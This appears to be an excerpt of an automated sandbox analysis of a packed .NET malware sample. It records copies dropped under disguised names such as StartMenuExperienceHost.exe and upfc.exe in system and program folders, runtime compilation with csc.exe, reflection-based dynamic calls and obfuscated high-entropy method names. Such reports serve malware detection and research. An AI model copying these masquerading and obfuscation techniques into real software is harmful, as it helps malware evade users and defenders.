                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: wldp.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: profapi.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeSection loaded: sspicli.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: apphelp.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeDirectory created: C:\Program Files\7-Zip\Lang\upfc.exeJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeDirectory created: C:\Program Files\7-Zip\Lang\ea1d8f6d871115Jump to behavior
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic file information: File size 1912832 > 1048576
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1d2800
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: upfc.exe, 00000011.00000002.2534120131.000000001C7E3000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.pdb source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.pdb source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: System.pdb source: upfc.exe, 00000011.00000002.2534120131.000000001C7E3000.00000004.00000020.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, wdL8CMv6YqRVim2kl7S.cs.Net Code: Type.GetTypeFromHandle(FOTlpGLFU55Aewft1s6.rKxtA5ajJVx(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(FOTlpGLFU55Aewft1s6.rKxtA5ajJVx(16777245)),Type.GetTypeFromHandle(FOTlpGLFU55Aewft1s6.rKxtA5ajJVx(16777259))})
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1794799 push edi; iretd 0_2_00007FF7C179479C
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C17947CF push ds; iretd 0_2_00007FF7C17947D5
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8DDA2 push esi; ret 0_2_00007FF7C1B8DDB2
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8DDC5 push edi; ret 0_2_00007FF7C1B8DDC6
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8E166 push edx; ret 0_2_00007FF7C1B8E176
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8D530 pushfd ; ret 0_2_00007FF7C1B8D541
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8F0FD push eax; retf 0_2_00007FF7C1B8F169
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8CD07 push edx; ret 0_2_00007FF7C1B8CD10
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8E4CD push eax; ret 0_2_00007FF7C1B8E4D4
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8E477 push ebp; ret 0_2_00007FF7C1B8E489
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8E053 push ebp; ret 0_2_00007FF7C1B8E057
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8F3FE push ecx; ret 0_2_00007FF7C1B8F40F
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B88B78 pushad ; ret 0_2_00007FF7C1B88B91
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1794799 push edi; iretd 17_2_00007FF7C179479C
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C17947CF push ds; iretd 17_2_00007FF7C17947D5
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C17BEF7C pushad ; retf 17_2_00007FF7C17BEF7D
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C17D43B8 push edi; iretd 17_2_00007FF7C17D43B9
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C17C68C6 push es; retf 17_2_00007FF7C17C68C7
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C17A21CE push esi; iretd 17_2_00007FF7C17A21CF
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1854E53 pushfd ; ret 17_2_00007FF7C1854EC2
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1854E39 pushfd ; ret 17_2_00007FF7C1854E52
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1854C93 pushfd ; ret 17_2_00007FF7C1854D02
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1854D73 pushfd ; ret 17_2_00007FF7C1854EC2
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B8E301 push edx; ret 17_2_00007FF7C1B8E302
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B8DD7F push edi; ret 17_2_00007FF7C1B8DD80
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B8D51C pushad ; ret 17_2_00007FF7C1B8D520
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B8E0A4 push esp; ret 17_2_00007FF7C1B8E0A8
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B8A04A pushfd ; ret 17_2_00007FF7C1B8A04B
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B8E3A0 push eax; ret 17_2_00007FF7C1B8E3B0
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B8E3C3 push ecx; ret 17_2_00007FF7C1B8E3C4
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B89FCD pushfd ; ret 17_2_00007FF7C1B89FE5
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: section name: .text entropy: 7.539794011288274
                              Source: StartMenuExperienceHost.exe.0.drStatic PE information: section name: .text entropy: 7.539794011288274
                              Source: llflCdrMcgGB.exe.0.drStatic PE information: section name: .text entropy: 7.539794011288274
                              Source: upfc.exe.0.drStatic PE information: section name: .text entropy: 7.539794011288274
                              Source: upfc.exe0.0.drStatic PE information: section name: .text entropy: 7.539794011288274
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, r9XFuJlqxnarimcZxLk.csHigh entropy of concatenated method names: 'sCVl37pLrt', 'PuGlnEp3GN', 'fdglFcP25y', 'GHut7diEjNJrCch00h4D', 'LFpSkUiE97gWULQFlc1Y', 'u7qp4ViEVwP8JCM6N52u', 'LSxZL5iEmJZYwE2P34Nt', 'TghZ2ZiEJ06W5UirkXAi', 'ipvKfQiEDdrucr9D7CN4', 'HJ4RLRiEu4H0Yvak9ucm'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, c7afOJ0Mx5GJNAfPtBq.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'eby0KXFumD', 'crFhpfiPKuGxCOMwWEyA', 'Lo2v6oiPEYcKHWZsZ9Ye', 'bluteaiPymUBZ3dONOBH', 'LWF8L4iPIgfZnvSafLoU', 'g3XWTIiPXt1FvZeRpwWA', 'jfnqSxiP4nfApgkX8xvu'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, X3f5VKzU5vUs3wx0mC.csHigh entropy of concatenated method names: 'sl5iiwrpSy', 'lHOiWse384', 'ogei2HexQC', 'SPMiAamKYt', 'pL0iwdySTw', 'OXlib9iDBp', 'gZGi8yeeHX', 'WTIkcci5qUtlBsfMjJBj', 'ta4FaSi5TR9DHdZawLXO', 'KmHNQDi53LVYLgyE1VsB'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, FR5UFRbBYUXQJ1OKXyR.csHigh entropy of concatenated method names: 'anYbPXeerx', 'lLVbvoADut', 'KPfPTliEq3FWrpVGmI2u', 'VKa2tiiElFQJqHi3dLRZ', 'jIhhCEiE8VBD0Jnlh8Jw', 'IEOvGEiET36UHsIu7Llv', 'Rfibrauu8y', 'xyvb7yEU1P', 'JhCba5iKKg', 'NAybSJpmFM'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, WfpbPWwD1c5fSY7QGRC.csHigh entropy of concatenated method names: 'FYUwMdHT7t', 'GZZKGRifS9qKkqqIxiv1', 'YDbZPnif7dJFsiquyaSG', 'K7sFIMifaeBKiquXLu52', 'pLZtNlif16bLeh4Vp5mO', 'E94', 'P9X', 'vmethod_0', 'lA4i29ac9HC', 'Swiil8WGj3m'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, HTtV9u8t2plM17sw3IG.csHigh entropy of concatenated method names: 'h7782MZYIC', 'wbR8ADN0BJ', 'gtv8wO4p57', 'QkB8bvOXSv', 'Gi48lldFr2', 'Ije88FKrd5', 'Gwf8qblGi5', 'wHd8TC1jHw', 'VSx83DJHFZ', 'nYq8niyUdG'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, r0wv8steyvy9rV1yIPT.csHigh entropy of concatenated method names: 'XvdWb2a94p', 'u8LHnuiZ2WJkQ4i18Cd2', 'YXlAIEiZA9GfCyYXD6Ht', 'CUw4PKiZwvt9yPnFEecT', 'kxUypEiZbyuFyEMarLOx', 'JDIKxPiZtrRtnwWx5qTN', 'RbKgi3iZWnYRLBShIZ6J', 'uckluWiZlPmOgvnKaoh6', 'UdrqdLiZ8xOYKdylyGJO', 'NPuWdZdDFM'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, lhTJyRPnsTQE8PMAY57.csHigh entropy of concatenated method names: 'XEqPR9jmdP', 'mgSPORK7F8', 'xIFPjVy1Na', 't56Pmg65Nk', 'mYpPJCSpNl', 'IXsPDvXuYR', 'SKfPuwtUKs', 'Q9YPosaW28', 'Dispose', 'H7aL96iQ8tJTpWLIN1G5'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, t4Lxi25W4dcm3ATI1hH.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'KPb5AU7Ztd', 'Write', 'E1M5wI3tRQ', 'S6Z5bsOImg', 'Flush', 'vl7'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, zGlyuSO46KlejH3Rkvo.csHigh entropy of concatenated method names: 'kmBOaS9R8N', 'eEHOSC0u3V', 'mfnO1CIUvF', 'CQBp4UiG9GJi4C7aC864', 'gN4WbFiGcTwlJQkDyXKY', 'DYPrYyiGOsKlQaJ0Fw09', 'UEB5hAiGV8GETNUAsDVF', 'crtOGOaaKN', 'AyuOBZXvhV', 'DFWOUPBcGv'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, RXGZI3oTsT0ybxCcrZM.csHigh entropy of concatenated method names: 'QLYonEpp3y', 'liUoFtrxwg', 'Ic3ogkbgiu', 'OYAoRl0buW', 'nVLoYSpeLl', 'YJc3ifiaYyN0MylFbxKK', 'hlXPTliag5qa35T8pErY', 'POBqqRiaRsBTMYIv15wd', 'ijQIBfia6YJvGrwbRCCE', 'hj7PvaiacZL917tycrh9'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, IrRCrolYgSxMj6FV43M.csHigh entropy of concatenated method names: 'i9jl9aILZc', 'T35h3KiEI7BTRR5pJFSt', 'GXPxPjiEEO0Rr5E4sEna', 'vUgawWiEysWHsuaKNxnM', 'UsLlc3sGAX', 'NtqMAfiECVZsZqhUErmK', 'h9wjteiEMffjAseUBrcO', 'EDrMg3iEkFFrXWrkufyQ', 'Vdc9m0iEZVvZQmIPqMXr', 'nyrCwmiEfAdGKVSBItap'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, VWQlJ9JHTTaLwFafgRv.csHigh entropy of concatenated method names: 'MGYJ0tVjYR', 'XIvJpX2o6E', 'FeUJPXlxKX', 'rGqJvUxiv6', 'LVAJQEsEUH', 'QJoJocirLk5bOqLtsIsY', 'qsfS3IirvnmeajZr4Tet', 'S4gI40irQvMDV3V9sZQt', 'DNtx8lirNrNtqKlcvBc9', 'HkEKLPirzy5qee5dubFF'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, RWoIkPfVEqbU5SvRSvX.csHigh entropy of concatenated method names: 's5PKFcd8Jo', 'WME7yriee6LqTPksBDIm', 'djon66ie1iqdpDMi4vNW', 'JQwDEHiehwv9WVlm2MRY', 'yR18HYieHF78oO6cDB1K', 'kt5', 'XBDfmhPgkm', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, gNqT7CVThDa5SUAYLqK.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'htKiljYwt1w', 'ItQilmPbt6Z', 'lFRa48iUd2OfELHLBsAG', 'GkHu3BiUipw1AMvINjjS', 'cbOd4ViUtOWwLVhwo0dj', 'OrG1AOiUWGPbV0HxRBwI', 'I13Z4TiU2QOoDoyXcn5F', 'W0CQipiUALPORxYEFHcC'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, tu4289svVjs9NeJaSuT.csHigh entropy of concatenated method names: 'EPmsLmLWJS', 'xSCsN1J8sd', 'NZQsz4Tr03', 'wVxGdOuhn6', 'CyeGigbgtu', 'Fu5Gt5xe9m', 'NEHGWxXi0o', 'WSNG2kPVu9', 'nX3GArJ4m4', 'bykGw2isk4'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, crpnv80XEAnclXT6NX5.csHigh entropy of concatenated method names: 'OuBiloGnEbC', 'X4iiwu4hZhG', 'WxyJmVivwIBreT3xhOS4', 'aRWvptiv2cw9fO3ZS74Z', 'VVPp7DivAp90mrhoCMyB', 'YvVA0qivb3kCYfjygCkE', 'OM6rTXivT0IeZJL6nL4V', 'MGs90piv8p5RhqxqoTNb', 'rgtIBIivqff16k0TFHSZ', 'xSNDUViv3FIJHSdeI0VQ'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, lqUTMbKeyoUcDqgP09S.csHigh entropy of concatenated method names: 'vsjKxii7Ji', 'k6r', 'ueK', 'QH3', 'BSlK0MV1Vw', 'Flush', 'eIUKpo6PxV', 'LGEKPnEkbE', 'Write', 'hYDKvvFdHr'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, Yumvj2gmU8XZdsV8oKE.csHigh entropy of concatenated method names: 'gVJOndA4Z9', 'V4mOFfA4Q4', 'r9lpjsisxhYfSPIfY505', 'Rx9C6ciseAmCD5NdEM4k', 'gGkVoXisHquX0XXry3Su', 'F28yjOis0t7N4EetG0C6', 'c3WwrvispYgHES0b3WI7', 'fsjOOfAtA7', 'YJErqOisLBLtytcmW2k3', 'KymetLisvWsHJyFSOGkQ'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, VecR7t6oidaPiRtsnn.csHigh entropy of concatenated method names: 'RETE6ou14', 'UJFxopiofnxX1GsmW8xe', 'MrCPBjioCBmUPqegESZK', 'aosJv8ioMfM71oKwy6Ec', 'YvVOZReNa', 'UTc9UBucG', 'YpCVmjyOB', 'tWljmuvd6', 'Uk8mYoXLF', 'dtpJcAMMi'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, BswtCm2s3PmlF3hYBWc.csHigh entropy of concatenated method names: 'dJl2LfK0vA', 'qCaC7wiMgLj3SNLa42AU', 'Unsdw1iMnicW0Q8MS9pp', 'kkoji4iMF4MNX2B0UxPn', 'wRWdawiMR2rbKPE7DuLC', 'ra5u8LiMONDrxhsKtlWX', 'Twl4XxiM6SS42yYLO76I', 'Jx1jQmiMcBbYFnQEmwZF', 'uAJxbciM9UrK64R4AonX', 'fISAwSy6k2'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, wsAZPquJncqOonUnohp.csHigh entropy of concatenated method names: 'Bahuu9far0', 'rBuuoI4XVZ', 'k5nu5pT9ae', 'RuJukbrSI7', 'Q55uZx7she', 'BOQcyMi7QXlwv45hgS7d', 'nItQvHi7LOQbfplyqAsd', 'AcO39ii7NfDyV4SmywKH', 'EXVBk8i7zHl7taNsonHU', 'zFhfppiad5RinqgiXsps'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, lv9vT8ZMbNveggoGIDE.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, PXJn06ArFBWscTPTD0k.csHigh entropy of concatenated method names: 'dGqAhKELCa', 'At39cmifnmqSp0KMCmfE', 'mq3g06ifTKSYJqoUjoVF', 'l0ADWUif3ecE7cuvbSpr', 'pW4gMsifFgYcnmgOnW8A', 'T7MyrUifgJWN5mYlBQs2', 'U1J', 'P9X', 'C3gi2RsjdKM', 'yMxi2YryjW6'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, dIppcakx595HhpNOUWb.csHigh entropy of concatenated method names: 'JSikp8ixYc', 'dsBkPnMe5j', 'y2WkvNxgu9', 'hkhkQ7r2Kh', 'rTMkLvca2u', 'cAEtpgiSejWGdm95Oh2X', 'I6PmmwiS1SIGxEmXkQFr', 'hKqiVMiShDtMuHwVqmZq', 'ODwsgjiSH8Sl5SDCxUyY', 'jwmmfTiSxtbAX9YgtOdH'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, EcIPLOZG4UjZOrORa5b.csHigh entropy of concatenated method names: 'uDFZUfJfP8', 'f2CZrElh05', 'VJnZ7nsJt5', 'fa4ZaBF0cP', 'd2TZSV9ATs', 'Y3bZ1QnvsI', 'cwkZhbBgAP', 'PciZexKLOR', 'hvSZHrEHD5', 'JVBZxktCY9'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, hpAZOMEeDePENB8LDhL.csHigh entropy of concatenated method names: 'Omo8KnixWEkLetFSxxeH', 'YmwdIIixiwb0CEDaKA8q', 'NoMfV1ixtUIY7WTPE0eG', 'mUkf3mix25kLnM5obxHm', 'x8dExIcks0', 'Mh9', 'method_0', 'UA8E09Fh9B', 'GN9Ep1fwmx', 'JXLEPT8b9b'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, DMJpOKwEJ70WRNCk0nl.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'ab4ilqBdCgK', 'qxvi2irdvXZ', 'lEtDDJifeXh1Z2UsnjKD', 'jb0g8pifHAeA6KKsOVsv', 'hTHeFKifxi9GD3gvMoVi'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, mqfOfr9FbfTZtdWQjyC.csHigh entropy of concatenated method names: 'HPy99vsmvu', 'r1p3qLiBdMSAAOfq99dZ', 'EXxQKMiBigaq6bB7Iiga', 'tWvZPfiGNduLyOsZBG9x', 'UgHxOaiGzqncqEayRe4f', 'iS5DRYiBtQhSdI2knDX5', 'u8y9RY3TFM', 'F4FNReiGpgHDlPTI0qth', 'kdgLvfiGx1qeQHaVj5y7', 'sVeuWPiG00OweMc1lwWP'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, fIi3sTAHL0TJsJU6AwG.csHigh entropy of concatenated method names: 'CErAQekeT5', 'Ib6ALYpC5e', 'CuAANY7lhQ', 'wUSAzdyZuA', 'q5VwdeNAs7', 'qU4wipmfp8', 'Kfowted8O0', 'FUUaf2ifJ2WVt1H1XxF4', 'tOyaErifjK6eavYF49TY', 'euI1fkifmUQqSqWUTaYj'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, Lot3PtARPQVqsRRUNod.csHigh entropy of concatenated method names: 'kPdA56cFp2', 'np1AkCnQyU', 'ecGAZnHP1i', 'xUQ4BRiMhtSQ7g3cxbXN', 'xqYwxMiMeKiq1vyytdGP', 'upbwEniMH95PG8L2WKht', 'wa3AJWtrOa', 'GJ0AD17wlt', 'Isvs1TiMatguiXULHHGW', 'tQRCTUiMSFuqCiQH156u'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, oafmxGvdbMr7STUHXKg.csHigh entropy of concatenated method names: 'BOgv25y0Md', 'D2ivAAqEWE', 'ODPx2jiQBBw94J9DlfNG', 'j31BHaiQsfcCDa70KgVk', 'iydKLUiQGsBlIeQgGFN8', 'SD2n7diQUam8x8t3JB0S', 'pshNkwiQrpIbMNMGF6bq', 'g3EjP7iQ7p88EpJqQpBq', 'JLtvtCPSvo', 'm5O7VKiQyfXfob7NqfbZ'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, UXJAIaPGEC87wWGRc5P.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'tBNPUF6QKq', 'HMXPrBEV3p', 'lX9P77YDF6', 'Dispose', 'gHIQNCiQjiK32DGj8Hs1', 'O4gTWUiQm6bwGBgIAJNm', 'AVVy5wiQJX2PXkDwfFyB', 'LcWAafiQDaj3axoQnPj6'
